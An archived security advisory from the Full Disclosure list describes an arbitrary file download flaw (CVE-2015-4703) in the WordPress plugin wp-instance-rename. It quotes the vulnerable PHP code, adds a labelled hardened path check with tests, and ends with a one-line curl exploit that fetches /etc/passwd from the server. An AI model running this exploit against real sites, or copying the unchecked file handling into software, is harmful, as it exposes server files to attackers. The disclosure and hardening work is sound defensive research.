
List:       full-disclosure
Subject:    [FD] Arbitrary File download in wordpress plugin wp-instance-rename v1.0
From:       "Larry W. Cashdollar" <larry0 () me ! com>
Date:       2015-06-26 0:45:18
Message-ID: 6814ADA4-7EAF-40D6-9515-F875DE6F5668 () me ! com

Title: Arbitrary File download in wordpress plugin wp-instance-rename v1.0
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-12
Download Site: https://wordpress.org/plugins/wp-instance-rename/
Vendor: Vlajo
Vendor Notified: 2015-06-12
Advisory: http://www.vapid.dhs.org/advisory.php?v=127
Vendor Contact:
Description: The WordPress Rename plugin allows you to easily rename the complete WordPress installation. It lets you rename the WordPress database and the WordPress directory and change every necessary configuration file, all from one page.

Vulnerability:
The code in mysqldump_download.php takes the file to serve straight from the dumpfname request parameter and never checks that it lies within the intended download directory, so any file readable by the web server process can be zipped and downloaded:

<?php
// Excerpt from mysqldump_download.php (closing braces supplied so the snippet parses).
try{
	$dbname   = $_GET["dbname"];
	$dumpfname = $_GET["dumpfname"];          // request-controlled path, never validated
	$backup_folder = $_GET["backup_folder"];  // request-controlled output directory
}catch (Exception $e){}

if(empty($backup_folder)){
	$backup_folder="backup/";
}
echo "$dumpfname";
// file_exists() accepts any absolute or relative path the web server can read
if (file_exists($dumpfname)) {
	// zip the dump file
	$name=$dbname . "_" . date("Y-m-d");
	$zipfname = $backup_folder.$name.".zip";
	$zip = new ZipArchive();
	if($zip->open($zipfname,ZIPARCHIVE::CREATE))
	{
	   $zip->addFile($dumpfname,$dumpfname);
	   $zip->close();
	}
	// read zip file and send it to standard output
	if (file_exists($zipfname)) {
		header('Content-Description: File Transfer');
		header('Content-Type: application/octet-stream');
		header('Content-Disposition: attachment; filename='.basename($zipfname));
		flush();
		readfile($zipfname);
	}
}
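
As an added example (not the plugin's or the author's code), a hardened version of the file lookup: the request may only name a bare file, which is resolved against a fixed server-side backup directory and rejected if it resolves anywhere else or is not a .sql dump. The directory name $backup_root and the function name are assumptions for the demonstration.

```php
<?php
// Added example, not the plugin's code: a hardened replacement for the
// unchecked $_GET["dumpfname"] handling in mysqldump_download.php.
// $backup_root is assumed to be a fixed, server-side path (hypothetical name);
// the browser may only supply a file name, never a directory.

function resolve_dump_path(string $backup_root, string $requested): ?string
{
    // Reject anything that is not a bare file name ("../x", "/etc/passwd", "").
    if ($requested === '' || $requested !== basename($requested)) {
        return null;
    }
    // Canonicalise both sides so '..' segments and symlinks cannot escape.
    $root = realpath($backup_root);
    $candidate = realpath($backup_root . DIRECTORY_SEPARATOR . $requested);
    if ($root === false || $candidate === false) {
        return null;
    }
    // The resolved file must sit directly inside the backup root.
    if (dirname($candidate) !== $root || !is_file($candidate)) {
        return null;
    }
    // Only SQL dumps are ever served from here.
    if (pathinfo($candidate, PATHINFO_EXTENSION) !== 'sql') {
        return null;
    }
    return $candidate;
}

// Demonstration on a constructed backup directory under the system temp path.
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'wp-rename-demo-' . getmypid();
mkdir($root);
file_put_contents($root . DIRECTORY_SEPARATOR . 'wp.sql', "-- constructed dump\n");
symlink('/etc/passwd', $root . DIRECTORY_SEPARATOR . 'link.sql'); // symlink escape attempt

$cases = [
    'wp.sql'           => true,   // legitimate dump inside the root
    '/etc/passwd'      => false,  // the absolute path used in the advisory
    '../../etc/passwd' => false,  // relative traversal
    'link.sql'         => false,  // symlink that resolves outside the root
    'wp.sql.php'       => false,  // wrong extension
];
foreach ($cases as $input => $expected) {
    $accepted = resolve_dump_path($root, $input) !== null;
    printf("%-18s %s\n", $input, $accepted === $expected ? 'ok' : 'MISMATCH');
}
unlink($root . '/link.sql'); unlink($root . '/wp.sql'); rmdir($root);
```

Every case should print "ok"; the hardened lookup still has to be combined with the plugin's own capability check for the admin page, which is outside this snippet.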

CVEID: 2015-4703
OSVDB:
Exploit Code:
curl --data "dbname=wp&dumpfname=/etc/passwd&backup_folder=."  \
http://www.example.com/wp-instance-rename/mysqldump_download.php -o p.zip

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

